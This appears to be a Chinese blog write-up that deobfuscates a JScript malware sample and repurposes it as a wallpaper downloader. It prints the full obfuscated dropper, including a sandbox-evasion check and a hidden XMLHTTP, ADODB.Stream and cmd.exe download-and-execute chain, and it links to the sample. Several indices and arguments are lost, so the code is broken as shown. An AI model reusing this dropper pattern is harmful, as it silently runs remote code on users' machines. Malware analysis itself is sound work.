
Virus_JS_BeRevisedAsDownTools

本篇是对JS样本做的简单分析,并将该样本改造成快速更换壁纸的工具,也可以用来下载网页.这是很久之前的事了,样本大概是卡饭16年12.16测试包里的.

0x1 我擦,这是啥!

// Fragment table used by the obfuscated body further down: every string is a
// two- or three-character slice of a longer token (object names, method names,
// JScript keywords) that the body re-assembles by concatenation. Nothing in
// this table is ever read by the added wallpaper/logging code; it only exists
// so the concatenated strings can be built at runtime.
var kqyxuz = "e;";
var tofla = "Ope";
var upugryf = ":\\";
var uffytr = "m.u";
var yvemken = "Fo";
var wymipi = ") ";
var jmisniqby = "  ";
var zmymep = "sp";
var ycpato = "ne";
var iwgude = "HT";
var imudle = "nyi";
var epgad = ").";
var ibyzl = "gor";
var yxypehn = "op";
var isuby = "re";
var zerdu = "e ";
var qdizrazy = "Ful";
var qecmuz = "for";
var bnifpynmu = "GET";
var xukkugpu = "MS";
var lfapob = "s3";
var ygsok = "eam";
var tlimto = ".n";
var ynsegru = "= ";
var xputhyzhe = "se";
var ozoru = "ADO";
var nereqi = "Sy";
var lzojaf = "Tem";
var ixyqjewg = "rn";
var orwoh = "rs";
var lwiju = "0";
var qahtyry = "eTo";
var djugy = "'C";
var qypivd = "5.";
var atniz = "Obj";
var rakxoba = "th";
var lihcuze = "le";
var lopedni = "os";
var havkafz = "tF";
var bhaxa = "cm";
var hutpopzi = "ri";
var ydtygtefc = "if";
var anqabyb = "Cre";
var lreptuqzi = "men";
var qolilge = "WS";
var cpuphylm = "Re";
var jyvibwi = "ML";
var zwapy = "at";
var boxdu = "/c";
var omykk = "pNa";
var juxno = "pe";
var jgekfo = "/ka";
var rdifbyji = "ng";
var oxpoc = " ";
var awnabda = "(i";
var ficy = "t";
var ftylunr = "\\'";
var yjufja = "Sc";
var ipurybg = "p:/";
var xekela = "me";
var entukat = "(y";
var dihgy = "se";
var sepziwb = "al";
var ojnike = "st";
var eqzamyxm = "am";
var qecego = "ex";
var iwsezpi = "l";
var ohovvi = "pe";
var roknadf = "Fil";
var kpebuf = "ip";
var gfugpalv = "Su";
var offotw = "rip";
var gbidufe = ");";
var ekupry = "le";
var szema = "on";
var ukpot = "em";
var bivygy = "er";
var vlovu = "d.";
var otiju = "Scr";
var kredak = "io";
var edbosfo = "pt";
var yslam = "r(";
var omygcurn = "ru/";
var yzviji = "e.";
var irrut = "Ge";
var odapan = "de";
var edisno = "de";
var ejup = "Bo";
var aqwidnapl = "Ge";
var affij = "ci";
var inegz = " 1";
var ixypki = "n";
var ehyhkor = "ke";
var axequ = "um";
var pqyjo = "En";
var zrypy = "WSc";
var lwalwylr = "ru";
var exov = "e";
var ohapzy = "ate";
var ynjotm = "TP";
var zjidude = "tS";
var idwodelx = "el";
var ocfobyff = "1";
var sesyve = " f";
var etdufmaf = "ld";
var cjupryhfi = "en";
var lozku = "e ";
var iqwigxysq = ";";
var xboroxb = "je";
var naqhi = "dy";
var squfquh = " >";
var dytywko = "Ob";
var welveq = "ipt";
var srunpe = "n";
var varlu = "ol";
var imsimyq = ".i";
var ugotri = "ct";
var ssywu = "XM";
var pwuzahwi = "zs";
var izxobmo = "g.";
var exag = "bd";
var gexga = "er";
var giqu = "t.";
var uqzyc = "al";
var evsupe = "Cl";
var mytpo = "Str";
var opqannan = "0)";
var egfomxe = "of";
var ipyfnob = "tu";
var fdilbybs = "ect";
var dgalo = "nk";
var ydopyz = "Wri";
var lokux = "lNa";
var igubm = "te";
var acwyvy = " t";
var yqvitik = "me";
var sufxexdo = "Fi";
var esgacnul = "Sav";
var zgara = "tu";
var amikze = "te";
var orsad = "in";
var gmisuh = ".X";
var afhygs = "se";
var hmesgaga = "re";
var lgyhuk = "ez";
var uhube = "Sh";
var nsukeso = "od.";
var irbyha = "or";
var hjypsyv = "in";
var iwdudno = "3 ";
var ppelonx = "et";
var ukud = "cr";
var tewo = "m(";
var gosax = "r ";
var ogkom = "ty";
var gofoja = "nd";
var igydpa = "DB.";
var pnazibo = "w ";
var ojuf = "ru";
var igjite = "ol";
var ebylx = "va";
var heni = "ls";
var zmahxinc = "L2";
var cubygri = "e";
var dyzagh = "rn";
var zisvu = " e";
var fekepy = "Get";
var xufxodc = "bF";

// Settings for the reworked wallpaper downloader (the "first segment" the
// article says was added on top of the original sample).
// localPahtTest is declared but nothing in this file reads it.
var localPahtTest = "C:\\Users\\tech\\Desktop\\dog.jpg";
// Passed to GetSpecialFolder; the article's decoded log shows "0" resolving
// to the Windows folder.
var specialPath = "0";
// 36-symbol alphabet (digits, then upper-case letters) that generateMixed draws from.
var chars = [
    '0', '1', '2', '3', '4', '5', '6', '7', '8', '9',
    'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
    'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'
];
// Random prefix so each downloaded wallpaper gets its own name instead of
// overwriting the previous one.
var rand = generateMixed();
var fileName = rand + "dog.jpg";

// NOTE(review): both arguments of this call were lost when the page was captured,
// so the line is not valid as shown. The article's text gives the wallpaper
// number range as roughly (2650, 4200), and its decoded log shows a resulting
// URL ending in 1052908.jpg, i.e. url3's trailing "105" followed by a number in
// that range — confirm against the original sample before relying on it.
var url2 = GetRandomNum(,);
var url3 = "http://img.bizhi.sogou.com/images/2015/01/20/105"
var strurl2 = url2.toString();
var url4 = ".jpg?f=download"
// Complete download URL; the obfuscated body below hands it to the XMLHTTP
// open() call (see the decoded log in the article).
var ovfowqi = url3 +  strurl2 + url4


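/**
 * Return a random integer in the closed range [Min, Max].
 *
 * The original used Math.round(Rand * Range), which gives the two endpoints
 * only half the probability of any interior value; drawing from (Range + 1)
 * equal-width buckets with Math.floor makes every integer in the range
 * equally likely. Bounds given in reverse order are swapped rather than
 * producing a negative span.
 *
 * @param {number} Min lower bound (inclusive)
 * @param {number} Max upper bound (inclusive)
 * @returns {number} an integer between Min and Max
 */
function GetRandomNum(Min,Max){
    var lo = Min;
    var hi = Max;
    if (lo > hi) {
        lo = Max;
        hi = Min;
    }
    var Range = hi - lo;
    // Math.random() is in [0, 1), so floor(r * (Range + 1)) is in [0, Range].
    return lo + Math.floor(Math.random() * (Range + 1));
}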

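/**
 * Build a short random tag (used as a file-name prefix) from a symbol table.
 *
 * The original indexed with Math.ceil(Math.random() * N) (the N was lost when
 * the page was captured): index 0 could only be produced when Math.random()
 * returned exactly 0, and depending on N the index could step past the last
 * entry. Math.floor over the table length keeps every index inside the table
 * with equal probability.
 *
 * @param {string[]} [alphabet] symbols to draw from; defaults to the file-level `chars`
 * @param {number} [length] number of symbols to emit; defaults to 3 like the original
 * @returns {string} the concatenated random symbols ("" for an empty table)
 */
function generateMixed(alphabet, length) {
    var pool = (alphabet == null) ? chars : alphabet;
    var count = (length == null) ? 3 : length;
    var res = "";
    if (pool.length === 0) {
        return res;
    }
    for (var i = 0; i < count; i++) {
        res += pool[Math.floor(Math.random() * pool.length)];
    }
    return res;
}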

// FileSystemObject handle referenced from inside the string that the gate below
// assembles (the "(y" + "bd" + "et" + "of" + "5." fragments), not from any
// plain-text line of this file.
var ybdetof5 = new ActiveXObject('Scripting.FileSystemObject');
// Obfuscator gate. Each ['x', frag, 'y'][] picks one entry of a small array,
// almost always the fragment variable from the table above; the surrounding
// single-letter entries are decoys. NOTE(review): every index inside the
// `[...][]` selectors was lost when the page was captured, so the listing is
// not valid JScript as shown.
// Reading only the named fragments, the string handed to `new Function` is an
// environment check: it enumerates the SubFolders of C:\ through ybdetof5 and
// returns true when the first entry's name is longer than one character,
// presumably so the payload stays dormant on a bare analysis machine — confirm
// against the original sample. The same fragment-selection trick produces
// every object and method name in the body; the article's decoded log
// (hneneqil0 = this[WScript] ... lysfopdep3[run](...)) is the ground truth for
// the comments that follow.
if (['dm', 'o', new Function(['e', ebylx, 'u', 'f'][] + [gosax, 'b'][] + ['e', 'y', hjypsyv, 'y'][] + [ehyhkor, 'hv', 'o', 'y'][] + [pwuzahwi, 'xx', 'u'][] + ['i', iwdudno, 'hf', 'z'][] + ['a', ynsegru, 'i'][] + ['u', 'i', ycpato][] + ['e', pnazibo, 'e'][] + ['c', pqyjo][] + ['i', 'u', axequ, 'e'][] + ['o', 'f', bivygy, 'r'][] + ['i', zwapy, 'o'][] + [irbyha, 'j'][] + ['v', 'hg', entukat][] + ['f', 'o', 'b', exag][] + ['c', 'lh', ppelonx, 'fh'][] + ['i', egfomxe][] + ['v', qypivd][] + [aqwidnapl, 'v'][] + [havkafz, 'a', 'e', 'a'][] + [igjite, 'y', 'u'][] + ['bx', odapan][] + ['wg', 'w', yslam, 'e'][] + [djugy, 'o', 'a'][] + ['e', upugryf, 'y'][] + ['a', ftylunr, 'wr', 'a'][] + ['v', epgad][] + ['dl', 'o', gfugpalv, 'pn'][] + ['dp', 'u', 'n', xufxodc][] + [varlu, 'u', 'u'][] + [edisno, 'i', 'k', 'cg'][] + ['i', 'vb', orwoh, 'i'][] + ['k', 'xc', 'r', gbidufe][] + [jmisniqby, 'k', 'll', 'e'][] + [ydtygtefc, 'i', 'dp'][] + ['t', awnabda][] + [dgalo, 'tx', 'kt', 'y'][] + ['y', lgyhuk, 'f', 'k'][] + [lfapob, 'u', 'sz', 'w'][] + [imsimyq, 'a'][] + [igubm, 'a', 's', 'e'][] + ['e', 'a', tewo][] + [opqannan, 'q'][] + ['i', 'll', 'sm', tlimto][] + ['o', eqzamyxm][] + [yzviji, 'f', 'z', 'bp'][] + ['sx', ekupry, 'cs'][] + [rdifbyji, 'u', 't', 'o'][] + [rakxoba, 'mc', 'x'][] + [squfquh, 'rs', 'y', 'mb'][] + [inegz, 'u', 'lg', 'y'][] + ['gw', wymipi, 'a'][] + [isuby, 'y'][] + ['y', 'i', 'h', ipyfnob][] + [ixyqjewg, 'v'][] + [acwyvy, 'xr', 't'][] + ['p', 'nt', 'y', ojuf][] + ['y', 'gz', kqyxuz][] + [zisvu, 'o', 'y'][] + ['j', heni][] + [zerdu, 'a'][] + [hmesgaga, 'd', 'i'][] + [zgara, 'dg', 'e'][] + [dyzagh, 'j'][] + [sesyve, 'u', 'o'][] + ['i', uqzyc, 'u'][] + ['e', xputhyzhe][] + ['e', iqwigxysq, 'n'][])()][]) {
    // All of the names below are assigned without `var`, i.e. as implicit globals.
    // this["WScript"] — the host object; everything else is created through it.
    hneneqil0 = this[['mt', 'u', zrypy, 'e'][] + ['i', offotw, 'w'][] + ['y', 'h', ficy, 'y'][]];
    // CreateObject("Scripting.FileSystemObject")
    istudyd7    = hneneqil0[['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][]](['xm', yjufja][] + ['zj', hutpopzi, 'o'][] + ['w', 'y', 'q', edbosfo][] + ['i', 'o', orsad][] + ['tk', 'o', 's', izxobmo][] + [sufxexdo, 'y', 'u'][] + ['vd', lihcuze][] + ['y', nereqi, 'z', 'y'][] + ['o', 'e', ojnike][] + ['e', ukpot, 'y'][] + ['e', dytywko][] + ['w', xboroxb][] + [ugotri, 'k', 'y'][]);
    // CreateObject("WScript.Shell") — only used for the final run() call.
    lysfopdep3  = hneneqil0[['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][]](['i', 'w', 'i', qolilge][] + ['o', ukud, 'e'][] + ['a', 'f', kpebuf, 'e'][] + ['y', giqu, 'nz', 'u'][] + [uhube, 'm', 'e', 'o'][] + ['u', 'y', idwodelx, 'e'][] + [iwsezpi, 'o'][]);
    // CreateObject("MSXML2.XMLHTTP") — the downloader.
    woqvybd3    = hneneqil0[['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][]](['rq', 'o', xukkugpu][] + ['dh', ssywu][] + [zmahxinc, 'u', 'jt'][] + ['gc', 'h', gmisuh, 'i'][] + ['y', jyvibwi, 'e'][] + ['a', 'y', iwgude][] + ['y', 'ht', ynjotm][]);
    // CreateObject("ADODB.Stream") — writes the response body to disk.
    jucyzmum2   = hneneqil0[['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][]](['u', ozoru][] + ['vq', igydpa][] + ['e', mytpo, 'hw', 'y'][] + ['u', 'i', 'u', ygsok][]);
    // GetSpecialFolder(specialPath), i.e. GetSpecialFolder("0"); the article's
    // log shows it resolving to C:\Windows, with no trailing separator.
    deskPath    = istudyd7[['dk', irrut, 'u', 'e'][] + ['q', zjidude][] + ['u', ohovvi][] + ['o', 'a', affij][] + ['u', sepziwb][] + [yvemken, 'r'][] + ['i', 'y', etdufmaf, 'y'][] + [gexga, 'y'][]](['o', specialPath][]);
    // GetTempName() — the result is never read; the reworked code names the
    // file with `fileName` instead.
    ubujile0    = istudyd7[['a', fekepy, 'bf'][] + ['s', lzojaf, 'c', 'mx'][] + ['a', 'zw', 'o', omykk][] + ['e', 'a', yqvitik][]]();
    // open("GET", ovfowqi, 0): synchronous request for the URL built above.
    fxejoplod6  = woqvybd3[[yxypehn, 'gh', 'pk', 'o'][] + ['rg', 'q', cjupryhfi][]]([bnifpynmu, 'mj', 'e'][], [ovfowqi, 'm', 'w'][] , ['k', lwiju][]);
    // send()
    fxejoplod6  = woqvybd3[['vd', 'o', dihgy][] + ['zj', gofoja][]]();
    // stream.type = 1 (binary), so the body is written byte-for-byte.
    jucyzmum2[['a', ogkom, 'jv'][] + ['a', 'i', 'z', juxno][]] = ['i', 'a', 'a', ocfobyff][];
    // ResponseBody of the completed request.
    avolcuc7 = woqvybd3[[cpuphylm, 'mq'][] + ['z', 't', 'q', zmymep][] + ['i', szema][] + ['a', afhygs, 'g'][] + ['o', ejup, 'i', 'i'][] + ['vz', naqhi][]];
    // WScript.ScriptFullName — read but never used afterwards.
    hnoqasann0 = hneneqil0[['h', 'u', otiju][] + ['kk', welveq][] + ['b', qdizrazy][] + [lokux, 'm'][] + ['gz', xekela, 'n', 't'][]];
    // stream.Open(); stream.Write(body); stream.SaveToFile(deskPath + fileName); stream.Close()
    fxejoplod6 = jucyzmum2[['e', 'vl', tofla][] + ['nm', ixypki, 'mj'][]]();
    fxejoplod6 = jucyzmum2[[ydopyz, 'u', 'q'][] + ['e', amikze][]](avolcuc7);
    // deskPath + fileName has no path separator between the two parts; the
    // article's log shows the file landing at C:\WindowsW7Qdog.jpg (a file in
    // the drive root whose name starts with "Windows"), not inside the folder.
    fxejoplod6 = jucyzmum2[['f', 'rn', 's', esgacnul][] + ['a', qahtyry, 'y', 's'][] + ['u', roknadf, 'u'][] + ['p', cubygri][]](deskPath + fileName);
    fxejoplod6 = jucyzmum2[[evsupe, 'i', 'kt'][] + ['o', 'c', lopedni][] + ['f', exov][]]();
    // shell.run("cmd.exe /c " + deskPath + fileName, 0): opens the saved file
    // through cmd.exe with a hidden window. This XMLHTTP -> ADODB.Stream.SaveToFile
    // -> WScript.Shell.run sequence is the part of the sample worth alerting on,
    // independent of what the downloaded file happens to be.
    fxejoplod6 = lysfopdep3[['a', lwalwylr][] + ['i', 'c', srunpe, 'pp'][]](['l', 'l', bhaxa, 'h'][] + ['wm', vlovu][] + ['ps', 'e', qecego][] + [lozku, 'y', 'ws'][] + [boxdu, 'bh', 'z', 'z'][] + [oxpoc, 'tk', 'n', 'u'][] + deskPath + fileName, ['k', lwiju][]);

    // "Second segment" added by the article's author: re-evaluates every
    // fragment expression above and writes the decoded text to C:\log_24.txt,
    // which is how the decoded listing in the article was produced.
    // NOTE(review): the count argument of each WriteBlankLines() call was
    // dropped when the page was captured.
    var fso=new ActiveXObject('Scripting.FileSystemObject'); 
    var f = fso.CreateTextFile("C:\\log_24.txt", true);

    f.Write("hneneqil0 = this["+['mt', 'u', zrypy, 'e'][] + ['i', offotw, 'w'][] + ['y', 'h', ficy, 'y'][] +"]");
    f.WriteBlankLines() ;
    f.Write("istudyd7   = hneneqil0["+['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][] + "]"+"("+['xm', yjufja][] + ['zj', hutpopzi, 'o'][] + ['w', 'y', 'q', edbosfo][] + ['i', 'o', orsad][] + ['tk', 'o', 's', izxobmo][] + [sufxexdo, 'y', 'u'][] + ['vd', lihcuze][] + ['y', nereqi, 'z', 'y'][] + ['o', 'e', ojnike][] + ['e', ukpot, 'y'][] + ['e', dytywko][] + ['w', xboroxb][] + [ugotri, 'k', 'y'][]+")");
    f.WriteBlankLines() ;
    f.Write("lysfopdep3 = hneneqil0["+['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][] + "]"+"("+['i', 'w', 'i', qolilge][] + ['o', ukud, 'e'][] + ['a', 'f', kpebuf, 'e'][] + ['y', giqu, 'nz', 'u'][] + [uhube, 'm', 'e', 'o'][] + ['u', 'y', idwodelx, 'e'][] + [iwsezpi, 'o'][]+")");
    f.WriteBlankLines() ;
    f.Write("woqvybd3   = hneneqil0["+['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][] + "]"+"("+['rq', 'o', xukkugpu][] + ['dh', ssywu][] + [zmahxinc, 'u', 'jt'][] + ['gc', 'h', gmisuh, 'i'][] + ['y', jyvibwi, 'e'][] + ['a', 'y', iwgude][] + ['y', 'ht', ynjotm][]+")");
    f.WriteBlankLines() ;
    f.Write("jucyzmum2  = hneneqil0["+['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][] + "]"+"("+['u', ozoru][] + ['vq', igydpa][] + ['e', mytpo, 'hw', 'y'][] + ['u', 'i', 'u', ygsok][]+")");
    f.WriteBlankLines() ;
    f.Write("deskPath   = istudyd7[" + ['dk', irrut, 'u', 'e'][] + ['q', zjidude][] + ['u', ohovvi][] + ['o', 'a', affij][] + ['u', sepziwb][] + [yvemken, 'r'][] + ['i', 'y', etdufmaf, 'y'][] + [gexga, 'y'][] + "]" + "(" +['o', specialPath][] +")" );
    f.WriteBlankLines() ;
    f.Write("ubujile0   = istudyd7[" + ['a', fekepy, 'bf'][] + ['s', lzojaf, 'c', 'mx'][] + ['a', 'zw', 'o', omykk][] + ['e', 'a', yqvitik][] + "]"+"()");
    f.WriteBlankLines() ;
    f.Write("fxejoplod6 = woqvybd3[" + [yxypehn, 'gh', 'pk', 'o'][] + ['rg', 'q', cjupryhfi][] +"]"+"("+[bnifpynmu, 'mj', 'e'][] +"," +[ovfowqi, 'm', 'w'][] +","+ ['k', lwiju][]+")");
    f.WriteBlankLines() ;
    f.Write("fxejoplod6 = woqvybd3[" + ['vd', 'o', dihgy][] + ['zj', gofoja][]+"]()");
    f.WriteBlankLines() ;
    f.Write( "jucyzmum2[" + ['a', ogkom, 'jv'][] + ['a', 'i', 'z', juxno][] +"] = " + ['i', 'a', 'a', ocfobyff][] );
    f.WriteBlankLines() ;
    f.Write( "avolcuc7 = woqvybd3[" + [cpuphylm, 'mq'][] + ['z', 't', 'q', zmymep][] + ['i', szema][] + ['a', afhygs, 'g'][] + ['o', ejup, 'i', 'i'][] + ['vz', naqhi][]+"]" );
    f.WriteBlankLines() ;
    f.Write( "hnoqasann0 = hneneqil0[" + ['h', 'u', otiju][] + ['kk', welveq][] + ['b', qdizrazy][] + [lokux, 'm'][] + ['gz', xekela, 'n', 't'][]+"]" );
    f.WriteBlankLines() ;
    f.Write("fxejoplod6 = jucyzmum2[" + ['e', 'vl', tofla][] + ['nm', ixypki, 'mj'][] +"]()");
    f.WriteBlankLines() ;
    // avolcuc7 is the binary response body, which is why this line of the
    // article's log shows Write() with nothing readable inside the parentheses.
    f.Write("fxejoplod6 = jucyzmum2[" + [ydopyz, 'u', 'q'][] + ['e', amikze][]+"]("+ avolcuc7+ ")" );
    f.WriteBlankLines() ;
    f.Write("fxejoplod6 = jucyzmum2[" + ['f', 'rn', 's', esgacnul][] + ['a', qahtyry, 'y', 's'][] + ['u', roknadf, 'u'][] + ['p', cubygri][] + "](" + deskPath + fileName + ")" );
    f.WriteBlankLines() ;
    f.Write("fxejoplod6 = jucyzmum2[" + [evsupe, 'i', 'kt'][] + ['o', 'c', lopedni][] + ['f', exov][] + "]()");
    f.WriteBlankLines() ;
    f.Write("fxejoplod6 = lysfopdep3[" + ['a', lwalwylr][] + ['i', 'c', srunpe, 'pp'][] +"]("+['l', 'l', bhaxa, 'h'][] + ['wm', vlovu][] + ['ps', 'e', qecego][] + [lozku, 'y', 'ws'][] + [boxdu, 'bh', 'z', 'z'][] + [oxpoc, 'tk', 'n', 'u'][] + deskPath + fileName + "," +  ['k', lwiju][] +")");
    f.WriteBlankLines() ;


    f.Close();

}

           

0x2 哦,是这样啊…

2.1首先声明下:

从 var localPahtTest = “C:\Users\tech\Desktop\dog.jpg” 到 var ybdetof5 = new ActiveXObject 之间的那一段为第1段(以下简称第1段);

从 var fso=new ActiveXObject(‘Scripting 到 f.Close(); 之间的那一段为第2段,这两段都是后来改造时添加的.

2.2 庐山真面目

有没有很酸爽的感觉?前面到底是啥玩意,尤其是去掉后来添加的部分之后.没事,还是用之前分析VBS时那个不靠谱的办法来处理,所以添加了第2段.

可以明显地看到 the real code saved to “C:\log_24.txt”,路径你随意,我就喜欢保存到这.好了,双击一下试试效果(当然现在输出的是我改成下壁纸之后的):

hneneqil0 = this[WScript]
istudyd7    = hneneqil0[CreateObject](Scripting.FileSystemObject)
lysfopdep3 = hneneqil0[CreateObject](WScript.Shell)
woqvybd3    = hneneqil0[CreateObject](MSXML2.XMLHTTP)
jucyzmum2   = hneneqil0[CreateObject](ADODB.Stream)
deskPath    = istudyd7[GetSpecialFolder](0)
ubujile0    = istudyd7[GetTempName]()
fxejoplod6 = woqvybd3[open](GET,http://img.bizhi.sogou.com/images/2015/01/20/1052908.jpg?f=download,0)
fxejoplod6 = woqvybd3[send]()
jucyzmum2[type] = 1
avolcuc7 = woqvybd3[ResponseBody]
hnoqasann0 = hneneqil0[ScriptFullName]
fxejoplod6 = jucyzmum2[Open]()
fxejoplod6 = jucyzmum2[Write]()
fxejoplod6 = jucyzmum2[SaveToFile](C:\WindowsW7Qdog.jpg)
fxejoplod6 = jucyzmum2[Close]()
fxejoplod6 = lysfopdep3[run](cmd.exe /c C:\WindowsW7Qdog.jpg,0)
           

这下有没有感觉到瞬间亲切了,我看了以后也是泪奔啊,尼玛这不是我发小吗,穿个马甲就变高富帅了啊…

既然都见着面了,怎么着也得帮我干点活吧,正好咱这人没追求,就喜欢看美女,My eye must be all in desktop , life is short ,u need wallpaper.

2.3 Wallpaper

从网上搜了个美女壁纸,就跳到搜狗上去了,看起来果然是show girl啊,于是乎就她了.

下了一张看了下,嗯,挺美,可是每次都是同一张,这就不太友好了吧,于是测了一下,壁纸的编号都是顺序的,且有一个大概的范围(2650,4200),好了,那中间的编号在这个范围内随机,就可以看到不同的美女了,对吧,说干就干,就有了

// NOTE(review): both arguments of this call were lost when the page was captured,
// so the line is not valid as shown. The surrounding text gives the wallpaper
// number range as roughly (2650, 4200), and the decoded log above shows a
// resulting URL ending in 1052908.jpg, i.e. url3's trailing "105" followed by
// a number in that range — confirm against the original sample.
var url2 = GetRandomNum(,);
var url3 = "http://img.bizhi.sogou.com/images/2015/01/20/105"
var strurl2 = url2.toString();
var url4 = ".jpg?f=download"
// Complete download URL handed to the XMLHTTP open() call.
var ovfowqi = url3 +  strurl2 + url4

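/**
 * Return a random integer in the closed range [Min, Max].
 *
 * The original used Math.round(Rand * Range), which gives the two endpoints
 * only half the probability of any interior value; drawing from (Range + 1)
 * equal-width buckets with Math.floor makes every integer in the range
 * equally likely. Bounds given in reverse order are swapped rather than
 * producing a negative span.
 *
 * @param {number} Min lower bound (inclusive)
 * @param {number} Max upper bound (inclusive)
 * @returns {number} an integer between Min and Max
 */
function GetRandomNum(Min,Max){
    var lo = Min;
    var hi = Max;
    if (lo > hi) {
        lo = Max;
        hi = Min;
    }
    var Range = hi - lo;
    // Math.random() is in [0, 1), so floor(r * (Range + 1)) is in [0, Range].
    return lo + Math.floor(Math.random() * (Range + 1));
}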
           

下了好几次,爽了一会,发现有时新下的还不如刚才那张呢,可是已经被覆盖了,再也找不回来了,唉,好伤心啊….

为了能在桌面再看你一眼,那就都保存着吧,不想再看的积累多了手删就好了,你给girl起名字总得不一样吧

// Passed to GetSpecialFolder; the decoded log above shows "0" resolving to
// the Windows folder.
var specialPath = "0";
// 36-symbol alphabet (digits, then upper-case letters) that generateMixed draws from.
var chars = [
    '0', '1', '2', '3', '4', '5', '6', '7', '8', '9',
    'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
    'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'
];
// Random prefix so each downloaded wallpaper gets its own name instead of
// overwriting the previous one.
var rand = generateMixed();
var fileName = rand + "dog.jpg";

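/**
 * Build a short random tag (used as a file-name prefix) from a symbol table.
 *
 * The original indexed with Math.ceil(Math.random() * N) (the N was lost when
 * the page was captured): index 0 could only be produced when Math.random()
 * returned exactly 0, and depending on N the index could step past the last
 * entry. Math.floor over the table length keeps every index inside the table
 * with equal probability.
 *
 * @param {string[]} [alphabet] symbols to draw from; defaults to the file-level `chars`
 * @param {number} [length] number of symbols to emit; defaults to 3 like the original
 * @returns {string} the concatenated random symbols ("" for an empty table)
 */
function generateMixed(alphabet, length) {
    var pool = (alphabet == null) ? chars : alphabet;
    var count = (length == null) ? 3 : length;
    var res = "";
    if (pool.length === 0) {
        return res;
    }
    for (var i = 0; i < count; i++) {
        res += pool[Math.floor(Math.random() * pool.length)];
    }
    return res;
}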
           
好了,这下满足了...
           

2.4 web

某天一拍脑袋,貌似上面这样做太明显了,那就装作是在学习吧,于是又做了第2次修改,改成下载网页(文章)的了.

0x3 SampleBeRevisedAsDown.

Sample - 请确认样本只用于测试再下载,其他用途我可不负责 - 密码为国际惯例

你只需要下载后放到桌面双击就ok了...
           

最后传一张美女图:

Virus_JS_BeRevisedAsDownTools